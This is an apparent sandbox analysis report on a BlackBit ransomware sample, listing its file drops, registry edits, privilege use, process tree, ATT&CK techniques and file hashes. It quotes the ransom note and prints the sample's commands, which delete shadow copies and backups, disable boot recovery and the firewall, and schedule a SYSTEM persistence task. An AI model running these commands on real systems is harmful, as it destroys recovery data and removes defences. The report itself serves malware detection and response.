File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\css\Restore-My-Files.txt	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\es.pak.DATA	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MEDIA\EXPLODE.WAV	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\EXP_PDF.DLL	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\SplashScreen.scale-125_contrast-white.png	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Work\contrast-white\SmallTile.scale-200.png	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ro-ro\Restore-My-Files.txt	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraSmallTile.contrast-white_scale-125.png	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ClippingTool.targetsize-32.png	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\contrast-black\LargeTile.scale-200_contrast-black.png	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\Ole DB\es-ES\msdasqlr.dll.mui	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\contrast-white\MixedRealityPortalSplashScreen.scale-200_contrast-white.png	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Home\contrast-black\SmallTile.scale-100.png	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\root\ui-strings.js	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-20_altform-unplated_contrast-black.png	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themeless\Restore-My-Files.txt	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe

Drops file in Windows directory 2 IoCs

Processes:

2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe

description	ioc	process
File created	C:\Windows\winlogon.exe	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Windows\winlogon.exe	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

996 schtasks.exe

pid	process
996	schtasks.exe

Modifies Control Panel 2 IoCs

evasion

Processes:

2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\Desktop\WallpaperStyle = "2"	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\Desktop\TileWallpaper = "0"	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe

Modifies registry class 8 IoCs

Processes:

2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\BlackBit	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\BlackBit\shell	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\BlackBit\shell\open	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\BlackBit\shell\open\command\ = "C:\\ProgramData\\kfugkkhg.exe \"%l\" "	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
Key created	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.BlackBit	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.BlackBit\ = "BlackBit"	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\BlackBit\shell\open\command	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe

Suspicious behavior: EnumeratesProcesses 25 IoCs

Processes:

2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe

pid	process
2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe

Suspicious use of AdjustPrivilegeToken 46 IoCs

Processes:

2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exeWMIC.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
Token: SeIncreaseQuotaPrivilege	3368	WMIC.exe
Token: SeSecurityPrivilege	3368	WMIC.exe
Token: SeTakeOwnershipPrivilege	3368	WMIC.exe
Token: SeLoadDriverPrivilege	3368	WMIC.exe
Token: SeSystemProfilePrivilege	3368	WMIC.exe
Token: SeSystemtimePrivilege	3368	WMIC.exe
Token: SeProfSingleProcessPrivilege	3368	WMIC.exe
Token: SeIncBasePriorityPrivilege	3368	WMIC.exe
Token: SeCreatePagefilePrivilege	3368	WMIC.exe
Token: SeBackupPrivilege	3368	WMIC.exe
Token: SeRestorePrivilege	3368	WMIC.exe
Token: SeShutdownPrivilege	3368	WMIC.exe
Token: SeDebugPrivilege	3368	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3368	WMIC.exe
Token: SeRemoteShutdownPrivilege	3368	WMIC.exe
Token: SeUndockPrivilege	3368	WMIC.exe
Token: SeManageVolumePrivilege	3368	WMIC.exe
Token: 33	3368	WMIC.exe
Token: 34	3368	WMIC.exe
Token: 35	3368	WMIC.exe
Token: 36	3368	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3368	WMIC.exe
Token: SeSecurityPrivilege	3368	WMIC.exe
Token: SeTakeOwnershipPrivilege	3368	WMIC.exe
Token: SeLoadDriverPrivilege	3368	WMIC.exe
Token: SeSystemProfilePrivilege	3368	WMIC.exe
Token: SeSystemtimePrivilege	3368	WMIC.exe
Token: SeProfSingleProcessPrivilege	3368	WMIC.exe
Token: SeIncBasePriorityPrivilege	3368	WMIC.exe
Token: SeCreatePagefilePrivilege	3368	WMIC.exe
Token: SeBackupPrivilege	3368	WMIC.exe
Token: SeRestorePrivilege	3368	WMIC.exe
Token: SeShutdownPrivilege	3368	WMIC.exe
Token: SeDebugPrivilege	3368	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3368	WMIC.exe
Token: SeRemoteShutdownPrivilege	3368	WMIC.exe
Token: SeUndockPrivilege	3368	WMIC.exe
Token: SeManageVolumePrivilege	3368	WMIC.exe
Token: 33	3368	WMIC.exe
Token: 34	3368	WMIC.exe
Token: 35	3368	WMIC.exe
Token: 36	3368	WMIC.exe
Token: SeBackupPrivilege	3880	vssvc.exe
Token: SeRestorePrivilege	3880	vssvc.exe
Token: SeAuditPrivilege	3880	vssvc.exe

Suspicious use of WriteProcessMemory 60 IoCs

Processes:

2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.execmd.execsc.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2648 wrote to memory of 1972	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	cmd.exe
PID 2648 wrote to memory of 1972	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	cmd.exe
PID 2648 wrote to memory of 1972	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	cmd.exe
PID 1972 wrote to memory of 996	1972	cmd.exe	schtasks.exe
PID 1972 wrote to memory of 996	1972	cmd.exe	schtasks.exe
PID 1972 wrote to memory of 996	1972	cmd.exe	schtasks.exe
PID 2648 wrote to memory of 1688	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	csc.exe
PID 2648 wrote to memory of 1688	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	csc.exe
PID 2648 wrote to memory of 1688	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	csc.exe
PID 1688 wrote to memory of 1332	1688	csc.exe	cvtres.exe
PID 1688 wrote to memory of 1332	1688	csc.exe	cvtres.exe
PID 1688 wrote to memory of 1332	1688	csc.exe	cvtres.exe
PID 2648 wrote to memory of 1996	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	cmd.exe
PID 2648 wrote to memory of 1996	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	cmd.exe
PID 2648 wrote to memory of 1996	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	cmd.exe
PID 2648 wrote to memory of 4324	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	cmd.exe
PID 2648 wrote to memory of 4324	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	cmd.exe
PID 2648 wrote to memory of 4324	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	cmd.exe
PID 2648 wrote to memory of 3728	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	cmd.exe
PID 2648 wrote to memory of 3728	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	cmd.exe
PID 2648 wrote to memory of 3728	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	cmd.exe
PID 2648 wrote to memory of 4856	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	cmd.exe
PID 2648 wrote to memory of 4856	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	cmd.exe
PID 2648 wrote to memory of 4856	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	cmd.exe
PID 2648 wrote to memory of 3676	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	cmd.exe
PID 2648 wrote to memory of 3676	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	cmd.exe
PID 2648 wrote to memory of 3676	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	cmd.exe
PID 2648 wrote to memory of 3672	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	cmd.exe
PID 2648 wrote to memory of 3672	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	cmd.exe
PID 2648 wrote to memory of 3672	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	cmd.exe
PID 2648 wrote to memory of 2396	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	cmd.exe
PID 2648 wrote to memory of 2396	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	cmd.exe
PID 2648 wrote to memory of 2396	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	cmd.exe
PID 2648 wrote to memory of 4504	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	cmd.exe
PID 2648 wrote to memory of 4504	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	cmd.exe
PID 2648 wrote to memory of 4504	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	cmd.exe
PID 3728 wrote to memory of 3368	3728	cmd.exe	WMIC.exe
PID 3728 wrote to memory of 3368	3728	cmd.exe	WMIC.exe
PID 3728 wrote to memory of 3368	3728	cmd.exe	WMIC.exe
PID 2396 wrote to memory of 1836	2396	cmd.exe	netsh.exe
PID 2396 wrote to memory of 1836	2396	cmd.exe	netsh.exe
PID 2396 wrote to memory of 1836	2396	cmd.exe	netsh.exe
PID 4504 wrote to memory of 1660	4504	cmd.exe	netsh.exe
PID 4504 wrote to memory of 1660	4504	cmd.exe	netsh.exe
PID 4504 wrote to memory of 1660	4504	cmd.exe	netsh.exe
PID 2648 wrote to memory of 1100	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	mshta.exe
PID 2648 wrote to memory of 1100	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	mshta.exe
PID 2648 wrote to memory of 1100	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	mshta.exe
PID 2648 wrote to memory of 3296	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	mshta.exe
PID 2648 wrote to memory of 3296	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	mshta.exe
PID 2648 wrote to memory of 3296	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	mshta.exe
PID 2648 wrote to memory of 1000	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	mshta.exe
PID 2648 wrote to memory of 1000	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	mshta.exe
PID 2648 wrote to memory of 1000	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	mshta.exe
PID 2648 wrote to memory of 216	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	mshta.exe
PID 2648 wrote to memory of 216	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	mshta.exe
PID 2648 wrote to memory of 216	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	mshta.exe
PID 2648 wrote to memory of 5952	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	mshta.exe
PID 2648 wrote to memory of 5952	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	mshta.exe
PID 2648 wrote to memory of 5952	2648	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe	mshta.exe

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

Processes:

2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Encrypted by BlackBit"	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your files have been encrypted due to a security problem with your computer\r\nIf you want to restore them, write us to the e-mail: Filesupport@airmail.cc\r\nWrite this ID in the title of your message: 143487C4\r\nIn case of no answer in 24 hours write us to this e-mail: unlockerhelp@onionmail.org"	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
"C:\Users\Admin\AppData\Local\Temp\2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- Checks computer location settings
- Drops startup file
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2648

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /CREATE /SC ONLOGON /TN BlackBit /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:1972

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN BlackBit /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:996

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mdp3i2dk\mdp3i2dk.cmdline"
2⤵
- Suspicious use of WriteProcessMemory
PID:1688

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAC81.tmp" "c:\ProgramData\CSC24F72396B5B349F5A75C23B77DBD286.TMP"
3⤵
PID:1332

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet
2⤵
PID:1996

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C wbadmin DELETE SYSTEMSTATEBACKUP
2⤵
PID:4324

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete
2⤵
- Suspicious use of WriteProcessMemory
PID:3728

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3368

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
2⤵
PID:3676

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
2⤵
PID:3672

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C netsh advfirewall set currentprofile state off
2⤵
- Suspicious use of WriteProcessMemory
PID:2396

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set currentprofile state off
3⤵
- Modifies Windows Firewall
PID:1836

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
2⤵
PID:4856

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C netsh firewall set opmode mode=disable
2⤵
- Suspicious use of WriteProcessMemory
PID:4504

C:\Windows\SysWOW64\netsh.exe
netsh firewall set opmode mode=disable
3⤵
- Modifies Windows Firewall
PID:1660

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
2⤵
PID:1100

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
2⤵
PID:3296

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
2⤵
PID:1000

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
2⤵
PID:216

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
2⤵
PID:5952

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3880

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

File Deletion

T1107

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\kfugkkhg.exe
Filesize
108KB

MD5
35120cb6afaf744337db5083db0b62c7

SHA1
cd3b0a5c5cf6acefea8863a7caf483abbc58d33a

SHA256
6bc9aa89602965a0c6d639a7f3e4544e6ae4645dfd6bc844252fae6dcf713d56

SHA512
df42ed8a20c3a9ac762de2cc22b4d9010b64363fb1750a1129ef2566a6f6acb398af7c2aff65196ad2bd5b4e55ecd9132e48afcea403cd32576392b173b6ee38

Download Submit
C:\ProgramData\winlogon.exe
Filesize
500KB

MD5
3a7c3e8a378cd7a4fd83910937c23b19

SHA1
395ce78f0eade3fc026122d18049edc7231827b7

SHA256
2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21

SHA512
3115fac1a8590f7c9cfc50793d43cbfb9688d8bc12cb56725a7040c0471c68e4b2b3bf177c1e2233e28c3259f7086ad861b3e2ea1fb050dac83a360b24efc00a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESAC81.tmp
Filesize
105KB

MD5
8a69eec202433c6f6d8f701dfb84fa79

SHA1
157d206f43b28608b04fa31fd3b119184144c330

SHA256
b114bd8af7585ffb49708f11fe9756ff8afbeb345f4077ac4057335d86231834

SHA512
5b8eea61c4344c9a2a685ff1627ef05f3a55ac9a2fcbb1811e360370923dcc00553864361bcbe4ced9e041c51f881a79b59a20dd24d09b16ac7198719047d368

Download Submit
C:\Users\Admin\AppData\Local\Temp\info.hta
Filesize
5KB

MD5
8a24368f4c30e676f194f75df8c4b708

SHA1
07ee1b4ddb0e68120192343349e0d32e008ffb12

SHA256
15ade99c0335705ad341fb1e29d15b70ed82bf9916ddc259ce62e60acb216380

SHA512
478e6c9dbab70922888c9f85283ee5c9a6833059c8efc26dda7c7477ba5ea0f9e73afd2807639bd290e52787fbd7fd2aeab58256c1b09f4439a5c68f99e0335c

Download Submit
C:\Users\Admin\AppData\Local\Temp\info.hta
Filesize
5KB

MD5
8a24368f4c30e676f194f75df8c4b708

SHA1
07ee1b4ddb0e68120192343349e0d32e008ffb12

SHA256
15ade99c0335705ad341fb1e29d15b70ed82bf9916ddc259ce62e60acb216380

SHA512
478e6c9dbab70922888c9f85283ee5c9a6833059c8efc26dda7c7477ba5ea0f9e73afd2807639bd290e52787fbd7fd2aeab58256c1b09f4439a5c68f99e0335c

Download Submit
C:\Users\Admin\Desktop\Restore-My-Files.txt
Filesize
286B

MD5
137cbae5ea5a27f6d0a6181cfbf80f7d

SHA1
ffb1902cbfb291173223496aa323b48f92875341

SHA256
60b8287dcea627e6886e81e3a2780890c7c359c44540a1e3d33fe29392f73177

SHA512
9515a7c4f132d8dc0b8f8a69ce9ea18d85dfd6e978d06dd90142fe99f59043e87154b5eafd293a75d73529636cc4587fd29bfdc085b3d4498abcca2b7a0cf7a0

Download Submit
\??\c:\ProgramData\CSC24F72396B5B349F5A75C23B77DBD286.TMP
Filesize
103KB

MD5
fe7986dbbc959f0d6a292d90f9a1a1ae

